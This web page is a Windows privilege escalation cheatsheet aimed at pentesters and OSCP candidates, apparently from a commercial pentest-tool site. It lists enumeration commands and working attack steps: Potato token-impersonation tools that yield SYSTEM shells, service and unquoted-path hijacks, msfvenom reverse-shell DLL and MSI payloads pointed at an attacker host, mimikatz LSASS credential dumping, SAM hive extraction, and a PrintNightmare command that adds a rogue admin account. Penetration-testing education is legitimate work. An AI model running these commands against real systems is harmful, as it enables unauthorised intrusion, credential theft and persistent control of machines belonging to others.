Windows Privilege Escalation Cheatsheet 2026

70+ techniques to go from a low-privilege user to NT AUTHORITY\SYSTEM. Enumeration, token impersonation (Potato), service misconfigs, unquoted paths, AlwaysInstallElevated, DLL hijacking and kernel exploits.

Last updated:

New to pentesting? Read our complete beginner's guide to see where privilege escalation fits in the methodology.

Quick Navigation

01 Enumeration 02 Token Privileges 03 Potato Attacks 04 Service Misconfig 05 Unquoted Paths 06 Registry & AutoRuns 07 AlwaysInstallElevated 08 Credential Hunting 09 Kernel & PrintNightmare 10 Automated Tools

# Initial Enumeration

Know your context before touching an exploit — who you are, your privileges, the patch level, and what's installed.

whoami /priv
List your token privileges — look for SeImpersonate, SeBackup, SeDebug
whoami /groups
Group membership — are you in a privileged group?
systeminfo
OS version, architecture and installed hotfixes (for kernel exploits)
net user; net localgroup administrators
Local users and who is a local admin
wmic qfe get HotFixID,InstalledOn
Patch history — feed into Windows Exploit Suggester
netstat -ano
Internal listening ports — services only bound to localhost

# Dangerous Token Privileges

Certain privileges are a direct path to SYSTEM. Enumerate with whoami /priv and match against this table.

PrivilegeExploit
SeImpersonatePotato attacks (PrintSpoofer, GodPotato)
SeAssignPrimaryTokenPotato attacks
SeBackupRead SAM/SYSTEM hives → dump hashes
SeRestoreOverwrite any protected file
SeDebugInject into a SYSTEM process
SeTakeOwnershipTake ownership of any object
reg save HKLM\SAM sam.hive && reg save HKLM\SYSTEM system.hive
With SeBackup — save the hives, then extract hashes offline with secretsdump

# Potato Attacks (SeImpersonate)

Service accounts (IIS, MSSQL) usually hold SeImpersonatePrivilege. The Potato family abuses it to become SYSTEM.

PrintSpoofer.exe -i -c cmd
PrintSpoofer — reliable SYSTEM shell on Windows 10/Server 2016-2019
GodPotato.exe -cmd "cmd /c whoami"
GodPotato — works across modern Windows including Server 2022
JuicyPotatoNG.exe -t * -p C:\Windows\System32\cmd.exe
JuicyPotatoNG — updated Potato for newer builds
💡 Tip: Landed as iis apppool\defaultapppool or an MSSQL service account? Check whoami /priv — SeImpersonate is almost always there.

# Service Misconfigurations

Weak service permissions let you replace the binary or reconfigure the service to run your payload as SYSTEM.

accesschk.exe -uwcqv "Users" *
Find services your user can modify (SERVICE_CHANGE_CONFIG)
sc qc SERVICE_NAME
Query a service's binary path and start config
sc config SERVICE_NAME binpath= "C:\temp\rev.exe"
Reconfigure a weak service to run your payload
sc stop SERVICE_NAME && sc start SERVICE_NAME
Restart the service to trigger your payload as SYSTEM
icacls "C:\Path\To\service.exe"
Check if the service binary itself is writable (just replace it)

# Unquoted Service Paths

A service path with spaces and no quotes lets Windows execute an earlier partial path — drop your binary there.

wmic service get name,pathname,startmode | findstr /i /v "C:\Windows\\" | findstr /i /v """
Find services with unquoted paths containing spaces
icacls "C:\Program Files\Some Folder\"
Check write access to an earlier directory in the path
copy rev.exe "C:\Program Files\Some.exe"
Place your binary so Windows runs it instead of the real service

# Registry, AutoRuns & DLL Hijacking

Writable autorun keys and DLL search-order flaws let your code run at higher privilege.

reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
List programs that autorun — is any binary writable?
accesschk.exe -wvu "HKLM\...\Run"
Check write access to autorun registry keys
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=443 -f dll -o hijack.dll
Build a malicious DLL for a hijackable search path

# AlwaysInstallElevated

If this policy is enabled, any user can install an MSI as SYSTEM — an instant win.

reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Check the HKLM key (must be 1)
reg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Check the HKCU key (must also be 1)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=443 -f msi -o evil.msi
Build a malicious MSI package
msiexec /quiet /qn /i evil.msi
Install it — runs as SYSTEM when the policy is set

# Credential Hunting

Windows stores passwords in more places than you'd expect — files, registry, and memory.

reg query HKLM /f password /t REG_SZ /s
Search the registry for stored passwords
findstr /si password *.txt *.ini *.config *.xml
Search files for hardcoded credentials
dir /s /b C:\Users\*unattend.xml C:\Windows\Panther\*
Unattended install files often contain the local admin password
cmdkey /list
Stored credentials — reuse with runas /savecred
mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit
Dump plaintext passwords and NTLM hashes from LSASS (needs SYSTEM)

# Kernel Exploits & PrintNightmare

Use kernel exploits as a last resort — match the exact build from systeminfo.

ExploitCVETarget
PrintNightmareCVE-2021-1675 / 34527Spooler service (most Windows)
HiveNightmareCVE-2021-36934Readable SAM (Win10/11)
CVE-2021-40449CallbackTableWin7 – Server 2019
CVE-2020-0787 (BITS)Arbitrary file moveWin7 – Win10
python windows-exploit-suggester.py --database db.xls --systeminfo sysinfo.txt
Map missing patches to public kernel exploits
Invoke-Nightmare -NewUser hacker -NewPassword Pass123!
PrintNightmare — add a local admin via the Spooler service

# Automated Enumeration Tools

Automate the checks — but validate every finding before you exploit it.

.\winPEASx64.exe
WinPEAS — the standard colour-coded privesc enumerator
powershell -ep bypass -c "Import-Module .\PowerUp.ps1; Invoke-AllChecks"
PowerUp — PowerShell privesc checks
.\Seatbelt.exe -group=all
Seatbelt — host survey for security-relevant settings
.\SharpUp.exe audit
SharpUp — C# port of PowerUp checks

❓ Windows Privilege Escalation FAQ

Enumerate. Run whoami /priv and whoami /groups, then systeminfo for patch level. WinPEAS speeds this up, but the OSCP exam rewards knowing the manual checks.

If you hold SeImpersonatePrivilege (common for IIS/MSSQL service accounts), the Potato family (PrintSpoofer, GodPotato) abuses it to impersonate the SYSTEM token and run as NT AUTHORITY\SYSTEM.

When a service path has spaces and no quotes, Windows tries each partial path. If you can write to an earlier directory, your binary runs with the service's privileges at startup.

A policy letting any user install MSI packages as SYSTEM. If both the HKLM and HKCU keys are 1, build a malicious MSI with msfvenom and run msiexec /quiet /i evil.msi for a SYSTEM shell.

WinPEAS is the standard tool. Alternatives: PowerUp (PowerShell), Seatbelt, and Windows Exploit Suggester for missing patches. Always validate manually before exploiting.

SeImpersonate/SeAssignPrimaryToken (Potato), SeBackup (read SAM), SeRestore, SeDebug and SeTakeOwnership. Check with whoami /priv.

With SYSTEM, dump SAM/LSA with reg save or mimikatz sekurlsa::logonpasswords. You can also dump LSASS with procdump/comsvcs.dll and parse offline with pypykatz.

Abusing the DLL search order: if a privileged program loads a DLL by name and you can write to a directory searched first, your DLL is loaded and runs with that program's privileges.

📚 Related Resources

AI-Assisted Pentest Report

Turn your SYSTEM compromise into a professional PDF report. AI auto-fills CVE, CVSS and severity.

Try for free →

Want all 12,020+ commands?

This Windows privesc cheatsheet is one branch of the map. Pentest Mindmap organizes 12,020+ commands across 34 categories — recon to post-exploitation — with instant search and one-click copy.

Start free →